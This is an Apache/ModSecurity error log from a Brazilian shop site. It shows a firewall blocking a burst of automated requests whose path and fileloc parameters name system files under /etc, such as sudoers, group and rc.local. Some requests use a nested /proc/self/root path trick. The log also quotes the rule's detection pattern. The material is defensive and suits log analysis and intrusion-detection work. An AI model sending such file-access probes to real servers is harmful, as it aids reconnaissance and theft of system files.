[Fri Mar 20 08:59:02.895876 2026] [:error] [pid 10189:tid 140411649607424] [client 57.141.18.79:34608] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hjJ3M9BSuKP7CAYqaQAAAIs"]
[Fri Mar 20 08:59:03.091250 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.107:34612] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02h_XLqtnMIWvjpaKmAgAAAoM"]
[Fri Mar 20 08:59:03.283582 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.105:34614] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hwF0L0L-SsrnPo50NwAAAs4"]
[Fri Mar 20 08:59:03.742633 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.15:34622] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02h9a6ubjKNq_cu4bhnQAAA0A"]
[Fri Mar 20 08:59:03.890405 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:60566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02h9a6ubjKNq_cu4bhngAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:04.232163 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.18:34634] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02iPqxLDW4GITHUkT03QAAARg"]
[Fri Mar 20 08:59:04.863644 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.7:34656] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02iPqxLDW4GITHUkT03wAAAQY"]
[Fri Mar 20 08:59:06.099636 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.94:34692] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ivqxLDW4GITHUkT04AAAAQ0"]
[Fri Mar 20 08:59:06.199316 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.120:34666] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02iuoXxyEfFpUF8f-L4QAAAVA"]
[Fri Mar 20 08:59:06.222360 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.51:34696] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02il1pVZ5mVmJwsFM9CgAAAEs"]
[Fri Mar 20 08:59:06.338996 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:60582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02il1pVZ5mVmJwsFM9CwAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:06.663618 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.78:34710] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ijJ3M9BSuKP7CAYqbQAAAIw"]
[Fri Mar 20 08:59:07.060970 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.32:34722] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02i9a6ubjKNq_cu4bhpQAAA1Q"]
[Fri Mar 20 08:59:08.587542 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.87:34726] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02i-oXxyEfFpUF8f-L4gAAAUA"]
[Fri Mar 20 08:59:08.590274 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.40:34736] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jLninkcc-iUj5AppcgAAA5Q"]
[Fri Mar 20 08:59:08.592444 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.92:34740] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jDJ3M9BSuKP7CAYqcQAAAI0"]
[Fri Mar 20 08:59:08.592522 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.86:34732] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02i_XLqtnMIWvjpaKmBwAAAoo"]
[Fri Mar 20 08:59:09.289139 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.70:34762] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jTJ3M9BSuKP7CAYqcgAAAJQ"]
[Fri Mar 20 08:59:09.797465 2026] [:error] [pid 21219:tid 140411599251200] [client 57.141.18.90:34770] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jfXLqtnMIWvjpaKmCwAAApE"]
[Fri Mar 20 08:59:09.928207 2026] [:error] [pid 31215:tid 140411691570944] [client 57.141.18.76:34774] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jQF0L0L-SsrnPo50OgAAAsY"]
[Fri Mar 20 08:59:10.727972 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.6:34790] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jrninkcc-iUj5AppcwAAA4k"]
[Fri Mar 20 08:59:10.978544 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.15:34794] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02juoXxyEfFpUF8f-L4wAAAVY"]
[Fri Mar 20 08:59:11.187263 2026] [:error] [pid 11167:tid 140411599251200] [client 57.141.18.25:34798] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02j_HIg5MgXLBnicMCUgAAAdE"]
[Fri Mar 20 08:59:11.849277 2026] [:error] [pid 31215:tid 140411632822016] [client 57.141.18.42:34810] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02jwF0L0L-SsrnPo50OwAAAs0"]
[Fri Mar 20 08:59:12.148459 2026] [:error] [pid 11167:tid 140411716749056] [client 57.141.18.102:34814] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02kPHIg5MgXLBnicMCVQAAAcM"]
[Fri Mar 20 08:59:12.351178 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.107:34778] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02kBCii7xarUs8iHZy3gAAAhI"]
[Fri Mar 20 08:59:13.095157 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.73:34838] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02keoXxyEfFpUF8f-L5AAAAVI"]
[Fri Mar 20 08:59:13.103587 2026] [:error] [pid 9818:tid 140411708356352] [client 57.141.18.124:34840] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02kV1pVZ5mVmJwsFM9DwAAAEQ"]
